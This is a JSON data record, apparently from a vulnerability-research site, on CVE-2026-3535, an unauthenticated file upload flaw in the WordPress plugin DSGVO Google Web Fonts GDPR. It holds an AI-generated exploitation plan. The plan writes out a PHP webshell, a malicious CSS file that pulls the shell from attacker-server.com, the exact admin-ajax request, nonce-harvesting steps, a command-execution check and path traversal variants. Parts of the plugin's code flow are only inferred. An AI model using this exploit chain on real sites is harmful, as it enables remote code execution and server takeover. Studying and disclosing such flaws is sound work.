[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f43Eah4y7QDXCJOidwnstrh7kWlyCdyUpoLQXTynpabg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-3535","dsgvo-google-web-fonts-gdpr-unauthenticated-arbitrary-file-upload-via-fonturl-parameter","DSGVO Google Web Fonts GDPR \u003C= 1.1 - Unauthenticated Arbitrary File Upload via 'fonturl' Parameter","The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `DSGVOGWPdownloadGoogleFonts()` function in all versions up to, and including, 1.1. The function is exposed via a `wp_ajax_nopriv_` hook, requiring no authentication. It fetches a user-supplied URL as a CSS file, extracts URLs from its content, and downloads those files to a publicly accessible directory without validating the file type. This makes it possible for unauthenticated attackers to upload arbitrary files including PHP webshells, leading to remote code execution. The exploit requires the site to use one of a handful of specific themes (twentyfifteen, twentyseventeen, twentysixteen, storefront, salient, or shapely).","dsgvo-google-web-fonts-gdpr",null,"\u003C=1.1","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-07 17:40:04","2026-04-08 06:43:39",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6203ffaf-5efd-4c66-85f0-cc3a05a03084?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3535 (DSGVO Google Web Fonts GDPR)\n\n## 1. Vulnerability Summary\nThe **DSGVO Google Web Fonts GDPR** plugin (up to version 1.1) is vulnerable to **Unauthenticated Arbitrary File Upload** leading to Remote Code Execution (RCE). The vulnerability exists in the `DSGVOGWPdownloadGoogleFonts()` function, which is hooked into `wp_ajax_nopriv_DSGVOGWPdownloadGoogleFonts`. \n\nThe function takes a user-supplied URL (`fonturl`), fetches its content (intended to be a Google Fonts CSS file), parses the content for URLs using a regular expression (identifying font file links), and then downloads those identified files to a publicly accessible directory on the WordPress server. Crucially, the plugin fails to validate the file extension or MIME type of the files downloaded from the URLs extracted from the CSS content. An attacker can provide a \"CSS\" file containing a link to a PHP shell, causing the plugin to fetch and store the shell on the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `DSGVOGWPdownloadGoogleFonts`\n- **Hook:** `wp_ajax_nopriv_DSGVOGWPdownloadGoogleFonts` (Unauthenticated) and `wp_ajax_DSGVOGWPdownloadGoogleFonts` (Authenticated).\n- **Vulnerable Parameter:** `fonturl` (POST or GET, typically POST in AJAX).\n- **Preconditions:**\n    - The WordPress site must be running one of the following themes: `twentyfifteen`, `twentyseventeen`, `twentysixteen`, `storefront`, `salient`, or `shapely`. (The plugin likely checks the current theme name via `wp_get_theme()->get_template()`).\n    - The `wp-content\u002Fuploads\u002F` directory must be writeable (standard for WordPress).\n\n## 3. Code Flow (Inferred)\n1. **Entry:** A request is sent to `admin-ajax.php?action=DSGVOGWPdownloadGoogleFonts`.\n2. **Hook Execution:** WordPress triggers the `DSGVOGWPdownloadGoogleFonts()` function.\n3. **Theme Check:** The function likely checks `if ( in_array( wp_get_theme()->get_template(), [...] ) )`.\n4. **CSS Fetch:** The code retrieves the URL from `$_POST['fonturl']`.\n5. **Content Retrieval:** The plugin uses `wp_remote_get( $fonturl )` to fetch the \"CSS\" content.\n6. **Regex Parsing:** It uses a regex like `\u002Furl\\(['\"]?([^'\")]+\\.(?:ttf|woff2?|eot|otf|php))['\"]?\\)\u002Fi` (or even broader) to find file URLs within the CSS.\n7. **Download Loop:** For each match, it calls `wp_remote_get( $file_url )`.\n8. **Sink:** The content of the downloaded file is saved to the filesystem using `file_put_contents()` or `WP_Filesystem` in a directory like `wp-content\u002Fuploads\u002Fdsgvo-google-web-fonts\u002F`. No extension checking is performed on the `$file_url` or the resulting filename.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability is described as unauthenticated and reachable via `nopriv`. However, many WordPress AJAX handlers still implement a nonce check via `check_ajax_referer`. \n\n### Nonce Investigation\n1. **Search for Nonce Creation:** Search the plugin source for `wp_create_nonce`. Look for the action string (e.g., `dsgvo-gdpr-nonce`).\n2. **Search for Localized Scripts:** Look for `wp_localize_script`.\n   - **Target Variable (Inferred):** `window.dsgvogwp_ajax?.nonce` or `window.dsgvo_gdpr_vars?.nonce`.\n3. **Triggering Nonce Generation:** The plugin likely only enqueues the script and nonce if the theme is supported and\u002For a specific setting is enabled.\n4. **Acquisition Steps:**\n   - Install and activate a supported theme: `wp theme install twentyseventeen --activate`.\n   - Create a dummy post to ensure frontend scripts load: `wp post create --post_status=publish --post_content='Testing Fonts'`.\n   - Navigate to the homepage.\n   - Use `browser_eval` to find the nonce:\n     ```javascript\n     \u002F\u002F Example (search for common patterns if exact key is unknown)\n     Object.keys(window).find(key => key.includes('dsgvo')) \n     ```\n\n## 5. Exploitation Strategy\nThe exploit requires an external \"attacker\" server to host two files: the malicious CSS and the PHP shell.\n\n### Step 1: Prepare Attacker Files\n1. **PHP Shell (`shell.php`):**\n   ```php\n   \u003C?php echo shell_exec($_GET['cmd']); ?>\n   ```\n2. **Malicious CSS (`exploit.css`):**\n   ```css\n   @font-face {\n     font-family: 'Exploit';\n     src: url('http:\u002F\u002Fattacker-server.com\u002Fshell.php');\n   }\n   ```\n\n### Step 2: Trigger the Upload\nSend the AJAX request to the target WordPress site.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=DSGVOGWPdownloadGoogleFonts&fonturl=http:\u002F\u002Fattacker-server.com\u002Fexploit.css&nonce=\u003CNONCE_IF_REQUIRED>\n  ```\n\n### Step 3: Locate the Shell\nThe plugin likely creates a subdirectory in `uploads`. Common naming conventions:\n- `\u002Fwp-content\u002Fuploads\u002Fdsgvo-google-web-fonts\u002Fshell.php`\n- `\u002Fwp-content\u002Fuploads\u002Fdsgvo-fonts\u002Fshell.php`\n\nThe exact path can be identified by:\n1. Monitoring the response of the AJAX call (it might return the local path).\n2. Checking the plugin source for the `wp_upload_dir()` usage.\n\n## 6. Test Data Setup\n1. **Theme Setup:**\n   ```bash\n   wp theme install twentyseventeen --activate\n   ```\n2. **Plugin Activation:**\n   ```bash\n   wp plugin activate dsgvo-google-web-fonts-gdpr\n   ```\n3. **Public Page:** Ensure a public page exists for nonce extraction if needed.\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` status.\n- The plugin will make an outbound request to `attacker-server.com\u002Fexploit.css`.\n- The plugin will then make a second outbound request to `attacker-server.com\u002Fshell.php`.\n- A file named `shell.php` (or similar) will be created in the WordPress uploads directory.\n\n## 8. Verification Steps\n1. **Confirm File Creation (via CLI):**\n   ```bash\n   find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads -name \"shell.php\"\n   ```\n2. **Verify RCE:**\n   Perform an HTTP request to the uploaded shell:\n   ```bash\n   http_request \"http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fuploads\u002Fdsgvo-google-web-fonts\u002Fshell.php?cmd=id\"\n   ```\n   **Expected Response:** Contains output of the `id` command (e.g., `uid=33(www-data)`).\n\n## 9. Alternative Approaches\n- **Path Traversal:** If the filename is extracted from the URL, check if `src: url('http:\u002F\u002Fattacker.com\u002F..\u002F..\u002Fshell.php')` allows escaping the intended directory.\n- **Direct Parameter Injection:** If the regex is weak, try `fonturl=http:\u002F\u002Fattacker.com\u002Fexploit.css?url=shell.php`.\n- **Theme Bypass:** If the site is not using a supported theme, try to pass a `template` or `theme` parameter if the plugin uses `$_REQUEST` to determine the current theme context, though this is unlikely given `wp_get_theme()`. If blocked, the researcher must manually switch themes as part of the \"preconditions.\"","gemini-3-flash-preview","2026-04-17 20:33:17","2026-04-17 20:33:36",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdsgvo-google-web-fonts-gdpr\u002Ftags"]